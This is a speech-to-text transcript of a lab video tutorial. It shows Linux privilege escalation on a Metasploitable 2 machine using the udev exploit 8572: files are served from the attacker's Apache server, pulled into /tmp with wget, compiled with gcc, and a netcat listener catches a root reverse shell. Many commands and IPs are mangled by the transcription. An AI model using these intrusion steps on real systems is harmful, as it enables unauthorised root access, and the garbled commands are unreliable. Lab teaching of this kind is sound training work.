Hey guys. So in the previous video we saw how we can use bad bash tool to exploit shellshock vulnerability. But we were only able to get to just a normal commercial. That's just the shell right here, which is just a normal commercial. It has low level shell. So it's not roadshow means you can run all to some level commands.

But to run system level commands or wherever, you must escalate all the privileges and get into root. escalating privileges basically means adding more rights or permissions to the user account. So in this video, I'm going to show you guys how you can do Linux privilege escalation by exploiting kernel vulnerability. A privilege escalation attack is as a type of network intrusion that takes advantage of programming errors or design flaws to grant the attacker, more access, elevated access to the network and it's dedicated apps or got on and stuff like that. Since we already have Shell install regular shell up and running. Let's look for the origin ID.

So you can just type your name in a dash a, we have 2624 kernel version running. So that's a pretty old one. Because current versions, it's like about 4.0. So we, we can find a lot of exploits in that particular machine. You can also type LSB. Release Date to see more data about the distribution.

There you go, we got more information. And well, I want to do something like a remote exploit on this particular version. And to get to find exploits for a version you can do in multiple ways. We can do like how we have been doing using source boy, which is an inbuilt tool in Kali or you can use an external database like a website, there's a cool website called exploit dash db.com that'll give you more exploits for versions that you're looking for. Or you can just type in Google for whatever, exploit that you're looking for that particular version, either way, but I'm going to go with the source point since since its inbuilt, I'm just going to use search boy. And I'm sure and I'm actually going to look for privilege because I want to see if there are any privilege exploits, privilege escalation ones.

I want to grep for this leanness because I don't only care about other other machines right now because we're we know that our target machines meta splittable to which is a Unix mission, and also want to grep for kernel just kernel exploits. And what else? Oh, and the last thing that I want to do, I wanted to prefer the version six. Let's see. Awesome. So one of the best ones is an 857 to exploit.

Let's see if we have it here. can use. We can use our for Linux privilege escalation, if you have it looks like Oh, actually we do awesome. There you go. Just copy it. And actually, you know what made it so that I can get the top of it.

That's a pad and let's look for it and see before the patients always get to look at the code before you execute it just so that you can analyze it and see what it exactly does. Enter. Looks like it's a C code, most exploits are unseen. So you got to use like a GCC compiler to do it. And just give it privileges give it like, executable privileges, stuff like that. In this one, it looks like it's just an exploit that leverage is that you functionality that is meant to run arbitrary commands when a device is removed.

So that's kind of what we're looking for right here. So it's a perfect one. And let's look for Well, we already, we already got it. So we're just gonna execute it now. Well actually, before it be executed, we need to make sure that our Apache server is running. So let's, let's do that real quick service, Apache to restart, and service, Apache to status to see if it's actually working or not perfect, so it's running.

Now, now what I want to do is, I want to create like a symbolic link between the directory where the exploit is located and the directory that serves files on the server. So I'm going to try to download it in future. I can just direct download an exploit directly from the server. That's what I'm gonna do. So to make a link, you can just type lm dat As. And the path which in this case it was, let's see, that was that it was to Linux.

So just copy that. And we want to we want to copy that to our local, our server. Sorry. So that would be www HTML. Enter. Also the file already so already tried this before, that's why it's giving me followed.

But if you're trying for the first time, you should not be getting that error. Okay, well, that's perfect. Because we already have it installed. Actually, hold on. I think that's because, oh, I know why. I didn't type local either.

I don't have an insult. so and so. Okay, that's fine. We have the exact exploits Linux local. That's right, WW. It only exists okay.

So our next step is to create an exploit that'll run from the temp folder from directory on the target. So first we need to create the father execute. So on Kali right here, let's go. Let's create a file in our server. So www HTML and just name it something like run. Since it's a bash script, I'm going to solve it that and run in bash.

And now I want to create a listener here because we want to come back so I call it an X IP address, which is 176. So let's go to that. Oh, wait. But this one shows one. So I'm going to restart that real quick, but type 192 1680 That's it. You don't really need to do anything after that.

I can just save it. Oh wait, this is meant bash. So let's type in ash. And yes that is it and W just save it. And now let's go back to our show and I need to repopulate it since the IPS change. Let me go to my Metasploit if it's still say more, that's change.

Okay, so now I'm going to see it. Let me just start my bad bash real quick again. This right here will be bash and cancer So let's wait till we get this in without that awesome. So now since I got the this particular file, I want to get it in here. So let's go to first temp folder because we want to get that exploited here. And just remove whatever is in here.

Ls it and now I want to say so w get HTTP 1921680176, which is my Kali Linux IP, and then run, which is a file which is exploited I want to download and then ls it and see Yep, we got it. Awesome. Now, the next thing is to get us the W gate function again, but this time, we need to get the a 572 script. So for that w http 1921680 176. Again, and that was just local video. Getting it from local and then a five, seven to party inter see if it is download it.

Awesome. We got a download. So since it's just so c file c script, we're just going to compile it using a normal command normal compiler. So GCC dash o exclude just a five out press exploit and a 500 dot c. ls. didn't get it. I wonder why they didn't get though.

Oh, that's because so it's because it's not able to. It's not finding the Id like a dynamic linker. So we need to define the ID command path with a dash B attribute. So all you got to do is just type gcc dash P, and then user the path then and output it as exploit 8572 dot c. There you go. So we got that up. executable as exploit, now all you got to do is you gotta run that, but you will need to run it on the process ID because this particular script, the documentation of this 8572 dot c file, it said that we need to find the P ID which is a process identifier of the Netflix net link socket, which is usually the P ID of the UDF process minus one.

So we can do that easily by looking for Yeah, the process in the process and net and that link should give you all the processes and whichever is like the only one which is not zero. That is our PA. That's the one we need to work mainly to exploit on. You can also check it by typing process and then just ox and then grep only. Yuda. This will give you like the number but plus one. As you can see 229493.

Awesome. So all you got to do now is exploited on that particular number. Before you do this, make sure you open the Netcat listener so that you can get a shell and 444321. Enter. Now go back and type enter. There you go.

We got the host, you got the show on it, just type ID, there you go. We got it. So that's one simple way to do it. It's some it's really efficient if you want to try doing it this way because you actually got past escalations. And when you do that, you can like you can literally see if you're, if you're just a local user or root type, who am I there you see, you got root privileges, so you can literally delete Do where all the executable level functions by this particular exploitation. Well, I hope you enjoyed this video.

We'll see you in the next one.